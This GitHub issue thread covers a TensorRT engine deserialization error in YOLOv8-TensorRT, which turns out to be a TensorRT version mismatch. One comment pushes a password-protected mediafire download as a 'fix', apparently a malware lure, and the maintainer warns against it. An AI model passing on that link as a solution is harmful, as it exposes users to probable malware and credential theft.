### ISSUE TITLE
AttributeError: 'NoneType' object has no attribute 'create_execution_context'

### ISSUE THREAD

**Issue by MadRex2000** [triple-Mu/YOLOv8-TensorRT#246]
When I run infer-cls.py with costum classify model will output attributeError.

```
[08/27/2024-09:50:40] [TRT] [E] 1: [runtime.cpp::parsePlan::314] Error Code 1: Serialization (Serialization assertion plan->header.magicTag == rt::kPLAN_MAGIC_TAG failed.)
Traceback (most recent call last):
  File "/usr/local/app/src/YOLOv8-TensorRT/infer-cls.py", line 74, in <module>
    main(args)
  File "/usr/local/app/src/YOLOv8-TensorRT/infer-cls.py", line 14, in main
    Engine = TRTModule(args.engine, device)
  File "/usr/local/app/src/YOLOv8-TensorRT/models/engine.py", line 218, in __init__
    self.__init_engine()
  File "/usr/local/app/src/YOLOv8-TensorRT/models/engine.py", line 227, in __init_engine
    context = model.create_execution_context()
AttributeError: 'NoneType' object has no attribute 'create_execution_context'
```

I have try to build engine by trtexec and yolo export but get same output.
tensorrt version: 8.6.1.post1
ultralytics version: 8.2.69
torch version: 2.4.0
cuda version: 12.2

**Comment by triple-Mu** [comment]
> When I run infer-cls.py with costum classify model will output attributeError.
> 
> ```
> [08/27/2024-09:50:40] [TRT] [E] 1: [runtime.cpp::parsePlan::314] Error Code 1: Serialization (Serialization assertion plan->header.magicTag == rt::kPLAN_MAGIC_TAG failed.)
> Traceback (most recent call last):
>   File "/usr/local/app/src/YOLOv8-TensorRT/infer-cls.py", line 74, in <module>
>     main(args)
>   File "/usr/local/app/src/YOLOv8-TensorRT/infer-cls.py", line 14, in main
>     Engine = TRTModule(args.engine, device)
>   File "/usr/local/app/src/YOLOv8-TensorRT/models/engine.py", line 218, in __init__
>     self.__init_engine()
>   File "/usr/local/app/src/YOLOv8-TensorRT/models/engine.py", line 227, in __init_engine
>     context = model.create_execution_context()
> AttributeError: 'NoneType' object has no attribute 'create_execution_context'
> ```
> 
> I have try to build engine by trtexec and yolo export but get same output. tensorrt version: 8.6.1.post1 ultralytics version: 8.2.69 torch version: 2.4.0 cuda version: 12.2

Can you try trtexec to export engine?
It seems that the tensorrt version you used to export the engine is inconsistent with the tensorrt version running the engine.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by triple-Mu** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

Don't download uncensored files! ! Pay attention to the security of personal information!

**Comment by triple-Mu** [comment]
Don't download uncensored files! ! Pay attention to the security of personal information!

**Comment by MadRex2000** [comment]
THANKS!!!!!
It's success after I use trtexec that install in local environment to build engine.
It seems will faild when build engine by yolo export and the trtexec in docker container.
But build engine in docker container should not faild , maybe there is something wrong with the environment.

**Comment by triple-Mu** [comment]
> THANKS!!!!! It's success after I use trtexec that install in local environment to build engine. It seems will faild when build engine by yolo export and the trtexec in docker container. But build engine in docker container should not faild , maybe there is something wrong with the environment.

Great!
Issue will be closed.
